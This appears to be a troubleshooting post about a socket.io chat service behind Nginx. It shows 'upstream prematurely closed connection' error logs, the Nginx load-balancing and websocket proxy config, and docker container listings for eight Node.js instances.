2016/08/07 09:15:29 [error] 14069#14069: *7877292 upstream prematurely closed connection while reading response header from upstream, client: 125.25.177.189, server: chat.geek4it.com, request: "GET /socket.io/?EIO=3&sid=QPdEtaKYseDpI2HkAJrB&transport=websocket HTTP/1.1", upstream: "http://172.30.31.1:10003/socket.io/?EIO=3&sid=QPdEtaKYseDpI2HkAJrB&transport=websocket", host: "chat.geek4it.com"
2016/08/07 09:15:29 [error] 14069#14069: *7877292 upstream prematurely closed connection while reading response header from upstream, client: 125.25.177.189, server: chat.geek4it.com, request: "GET /socket.io/?EIO=3&sid=QPdEtaKYseDpI2HkAJrB&transport=websocket HTTP/1.1", upstream: "http://172.30.31.1:10006/socket.io/?EIO=3&sid=QPdEtaKYseDpI2HkAJrB&transport=websocket", host: "chat.geek4it.com"
Server: Socket.io
Android: socket.io-client-java
iOS: Socket.IO-Client-Swift
Server: AWS EC2
Nginx: nginx/1.11.3
Server 1: Nginx
Server 2: 8 socket.io instance written with Node.js (Running with docker container)
Server 1:
Nginx Config:
upstream chatroom_nodes {
ip_hash;
server 172.30.31.1:10001 weight=10 max_fails=3 fail_timeout=30s;
server 172.30.31.1:10002 weight=10 max_fails=3 fail_timeout=30s;
server 172.30.31.1:10003 weight=10 max_fails=3 fail_timeout=30s;
server 172.30.31.1:10004 weight=10 max_fails=3 fail_timeout=30s;
server 172.30.31.1:10005 weight=10 max_fails=3 fail_timeout=30s;
server 172.30.31.1:10006 weight=10 max_fails=3 fail_timeout=30s;
server 172.30.31.1:10007 weight=10 max_fails=3 fail_timeout=30s;
server 172.30.31.1:10008 weight=10 max_fails=3 fail_timeout=30s;
}
server {
listen 80;
server_name test.geek4it.com;
access_log /var/log/nginx/geek4it/access.log main;
error_log /var/log/nginx/geek4it/error.log warn;
location / {
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_http_version 1.1;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header Host $host;
proxy_pass http://chatroom_nodes;
proxy_redirect off;
proxy_buffers 8 24k;
proxy_buffer_size 2k;
}
}
Server 2:
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
5e4651be48b5 registry.geek4it.com:5000/chat-runtime:130 "/bin/bash /opt/chatr" 26 hours ago Up 25 hours 0.0.0.0:10004->3000/tcp chatroom-4_1
6fedbde6383e registry.geek4it.com:5000/chat-runtime:130 "/bin/bash /opt/chatr" 26 hours ago Up 25 hours 0.0.0.0:10005->3000/tcp chatroom-5_1
129e8ae422be registry.geek4it.com:5000/chat-runtime:130 "/bin/bash /opt/chatr" 26 hours ago Up 25 hours 0.0.0.0:10002->3000/tcp chatroom-2_1
857d03c18649 registry.geek4it.com:5000/chat-runtime:130 "/bin/bash /opt/chatr" 26 hours ago Up 25 hours 0.0.0.0:10008->3000/tcp chatroom-8_1
625dc44e81ef registry.geek4it.com:5000/chat-runtime:130 "/bin/bash /opt/chatr" 26 hours ago Up 25 hours 0.0.0.0:10000->3000/tcp chatroom-0_1
b99334904496 registry.geek4it.com:5000/chat-runtime:130 "/bin/bash /opt/chatr" 26 hours ago Up 25 hours 0.0.0.0:10006->3000/tcp chatroom-6_1
ea648a3913d6 registry.geek4it.com:5000/chat-runtime:130 "/bin/bash /opt/chatr" 26 hours ago Up 25 hours 0.0.0.0:10007->3000/tcp chatroom-7_1
4a8884303dbc registry.geek4it.com:5000/chat-runtime:130 "/bin/bash /opt/chatr" 26 hours ago Up 24 hours 0.0.0.0:10001->3000/tcp chatroom-1_1
d83e11a1fca5 registry.geek4it.com:5000/chat-runtime:130 "/bin/bash /opt/chatr" 26 hours ago Up 24 hours 0.0.0.0:10003->3000/tcp chatroom-3_1
PS: I use the http protocol like: http://xxxxx to connect to the server.